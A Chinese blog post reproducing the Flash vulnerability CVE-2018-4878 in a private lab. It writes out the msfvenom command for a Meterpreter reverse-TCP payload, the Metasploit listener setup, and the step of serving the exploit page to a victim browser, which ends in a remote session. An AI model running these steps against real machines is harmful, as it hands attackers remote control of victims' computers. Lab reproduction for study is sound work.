您现在的位置是:网站首页> 网络安全 渗透测试

CVE-2018-4878 Flash漏洞复现

exploit2019-07-22 16:55:08渗透测试人已围观

简介出于好奇,复现一下之前的老洞!大佬勿喷

Cve-2018-4878

一、 复现过程

环境准备:

本机         ip地址: 192.168.10.85

攻击机(kaliip地址: 192.168.10.95

受害者主机   ip地址: 192.168.10.129

第一步、使用msf生成一个shellcode文件

命令:msfvenom –p windows/meterpreter/reverse_tcp LHOST=192.168.10.95 LPORT=5555 –f python > /root/shellcode.txt

在主目录就生成了一个shellcode文件,打开,全选,替换exploit.py中的shellcode


Kali里生成的shellcode文件内容替换到exploit.py文件中的这一段然后保存

 

一、        运行替换之后的exploit.py文件

方法:先进入exploit.py存放的文件夹中然后双击运行(前提要安装python环境)


生成了两个文件,exploit.swfindex.html

把这两个文件放到web服务器(我这里用的phpstudy搭建的,文件路劲为/www/cve


一、 在msf中启动监听模块


启动监听的命令:

1、  先启动metasploit 命令:msfconsole

2、  启动之后 执行的命令为:use exploit/multi/handler

3、  接下来设置payload 命令:set payload windows/meterpreter/reverse_tcp

4、  下一步设置ip以及端口(这里的ip以及端口必须和你刚才生成shellcode文件使用的ip和端口相一致)

命令:set lhost 192.168.10.95

      set lport 5555  现在就设置完毕了



执行命令:exploit  就开启了监听模式,准备工作到这里就已经准备完毕。

下面使用受害者的浏览器访问这个index.html页面

我在物理机搭建的web服务器    ip地址是192.168.10.85

通过受害者浏览器访问http://192.168.10.85



使用的浏览器为360安全浏览器,版本信息为9.1.0.406  内核版本为:55.0..2883.87


现在就已经拿到受害者计算机的会话了



很赞哦!()

文章评论

    请先说点什么
    热门评论
    人参与,0条评论
exploit

exploit(共6篇文章)

啥也不会的我